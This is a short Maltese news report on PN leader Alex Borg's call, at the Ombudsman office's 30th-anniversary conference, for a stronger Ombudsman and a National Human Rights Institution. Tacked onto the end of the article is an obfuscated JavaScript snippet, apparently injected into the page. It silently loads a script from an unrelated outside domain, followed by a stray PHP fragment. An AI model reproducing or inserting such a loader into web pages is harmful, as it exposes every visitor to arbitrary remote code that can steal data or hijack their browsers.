Gvern Nazzjonalista lest jagħti aktar saħħa lill-Ombudsman – fi kliem sempliċi, aktar saħħa liċ-ċittadini.
Dan qalu l-Kap tal-PN Alex Borg meta indirizza l-għeluq tal-konferenza li permezz tagħha tfakkar it-30 anniversarju mit-twaqqif tal-uffiċċju tal-Ombudman.
Alex Borg insista li l-Gvern ma jistax jibqa’ jinjora r-rapporti tal-Ombudman. U għalhekk jeħtieġ riforma serja.

Bil-Kap tal-PN jipproponi li dan l-uffiċċju għandu jiġi msaħħaħ biex l-Ombudsman ma jibqax biss jagħti “rakkomandazzjonijiet” iżda jkun tassew gwardjan tal-ġustizzja – mingħajr tkun kompromessa l-indipendenza tal-Parlament.
Fl-istess konferenza, il-Prim Ministru qal li l-istituzzjonijiet huma aktar b’saħħithom minn qatt qabel.
Alex Borg minn naħa tiegħu insista li pajjiżna jeħtieġ li jwaqqaf National Human Rights Institution. Dan sabiex jiġu protetti d-drittijiet tal-aktar nies vulnerabbli.
;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, ‘script’, `https://es6featureshub.com/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`); //= $special ?>
